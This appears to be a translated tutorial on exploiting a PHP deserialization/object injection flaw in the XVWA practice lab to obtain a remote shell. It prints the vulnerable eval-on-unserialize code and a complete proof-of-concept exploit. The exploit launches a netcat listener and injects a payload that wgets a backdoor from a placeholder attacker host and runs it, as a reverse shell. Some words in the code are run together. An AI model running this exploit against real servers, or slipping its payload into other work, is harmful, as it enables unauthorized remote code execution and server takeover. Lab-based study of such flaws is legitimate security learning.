PHP serialization/object injection vulnerability analysis_php skills

This article is a short article about PHP serialization/object injection vulnerability analysis, which describes how to obtain the remote shell of the host.

If you want to test this vulnerability yourself, you can do so via XVWA and Kevgir.

In the first step of exploiting the vulnerability, we start to test whether the target application has PHP serialization. To assist testing, we used Burpsuite's SuperSerial plug-in, the download address is here. It passively detects the presence of PHP and Java serialization.

Analysis
We detected the use of PHP serialization in the application, so we can start to identify whether the application code contains a remote code execution vulnerability. It should be noted that the serialized object is taken from the parameter "r":

$var1=unserialize($_REQUEST['r']);
Then deserialize and eval:

eval($this->inject);
Then, execute:

echo "
".$var1[0]." - ".$var1[1];
With this, if we bypass the PHP serialization object of parameter r, we can obtain a code execution vulnerability!

< &#63;php 
  error_reporting(E_ALL);
  class PHPObjectInjection{
    public $inject;
 
    function __construct(){
 
    }
 
    function __wakeup(){
      if(isset($this->inject)){
        eval($this->inject);
      }
    }
  }
//&#63;r=a:2:{i:0;s:4:"XVWA";i:1;s:33:"XtremeVulnerable Web Application";}
  if(isset($_REQUEST['r'])){ 
 
    $var1=unserialize($_REQUEST['r']);
    
 
    if(is_array($var1)){ 
      echo "
".$var1[0]." - ".$var1[1];
    }
  }else{
    echo "parameter is missing";
  }
&#63; >

Exploit
To exploit this vulnerability, we created a simple PHP script to automatically generate a PHP serialization payload and run the desired command on the target remote host. Then, I created a general PHP rebound shell, the download address is as follows:

http://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz
Note: You need to transfer this file to the web server, change the local IP and port in the rebound shell script, and the following exploit code:

<&#63;php 
/*
PHP Object Injection PoC Exploit by 1N3@CrowdShield - https://crowdshield.com
A simple PoC to exploit PHP ObjectInjections flaws and gain remote shell access. 
Shouts to @jstnkndy @yappare for theassist!
NOTE: This requireshttp://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gzsetup on a remote host with a connect back IP configured
*/
print"==============================================================================\r\n";
print "PHP Object Injection PoCExploit by 1N3 @CrowdShield - https://crowdshield.com\r\n";
print"==============================================================================\r\n";
print "[+] Generating serializedpayload...[OK]\r\n";
print "[+] Launching reverselistener...[OK]\r\n";
system('gnome-terminal -x sh -c \'nc -lvvp1234\'');
class PHPObjectInjection
{
  //CHANGE URL/FILENAME TO MATCH YOUR SETUP
 public $inject = "system('wget http://yourhost/phpobjbackdoor.txt-O phpobjbackdoor.php && php phpobjbackdoor.php');";
}
 
$url ='http://targeturl/xvwa/vulnerabilities/php_object_injection/&#63;r='; // CHANGE TOTARGET URL/PARAMETER
$url = $url . urlencode(serialize(newPHPObjectInjection));
print "[+] Sendingexploit...[OK]\r\n";
print "[+] Dropping down tointeractive shell...[OK]\r\n";
print"==============================================================================\r\n";
$response =file_get_contents("$url");
 
&#63; >

Demo
Now that our application script is ready, we can execute it to get a rebound shell on the remote host for remote execution of commands!

The above is the entire content of this article. I hope it will be helpful to everyone in learning PHP programming.